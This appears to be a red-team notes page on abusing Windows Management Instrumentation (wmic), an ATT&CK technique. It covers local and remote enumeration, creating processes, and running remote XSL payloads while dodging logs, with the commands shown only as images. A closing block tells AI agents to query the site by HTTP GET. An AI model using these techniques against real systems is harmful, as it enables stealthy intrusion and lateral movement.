# T1047:Windows Management Instrumentation Adversaries may abuse Windows Management Instrumentation (WMI) to achieve code execution. WMI is a Windows Administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135. An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. Very awesome things we can do with wmic(Command-Line), in a local and/or remote manner. Let's enumerate locally we can grab valued info such as Name, Manufacturer, Model, Domain and a Description ![](/files/-MRhG_o5wjyq0DEzo18o) Environment ![](/files/-MRhGaVf8qMgGI_tDOCo) Users, Groups ![](/files/-MRhGbKoyC1drTQqD_vc) Missing patches: ![](/files/-MRhGcDaeG6sNKtGLPAP) Execution of an XSL File ![](/files/-MRhGczo03lR4c8LBxVJ) Execution, we can create a process and execute code ![](/files/-MRhGdgvTnfwk5-vVsCO) Wmic is proxy aware so it can also call xsl file from remote host that can contain our payloads. This is a great method to avoid logs as it is very uncommon to be used and OPSEC safe for environments. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/execution/t1047-windows-management-instrumentation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.